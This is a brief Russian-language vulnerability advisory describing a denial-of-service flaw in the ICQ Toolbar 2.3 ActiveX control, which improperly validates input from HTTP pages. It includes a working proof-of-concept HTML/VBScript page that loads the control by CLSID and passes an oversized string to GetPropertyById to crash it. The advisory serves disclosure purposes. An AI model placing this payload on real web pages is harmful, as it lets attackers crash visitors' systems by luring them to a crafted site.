Программа: ICQ Toolbar 2.3 ActiveX

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую
систему. Уязвимость существует из-за ошибки в проверке входных данных при
обработке HTTP страниц. Атакующий может обманным образом заманить пользователя
на специально составленный сайт, что приведет к отказу системы в обслуживании.

Пример:

<html>
<object classid='clsid:855F3B16-6D32-4FE6-8A56-BBB695989046' id='toolbar' ></object>

<script language='vbscript'>
bof=String(128, "spdr")
toolbar.GetPropertyById "" ,bof

</script>
</html>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии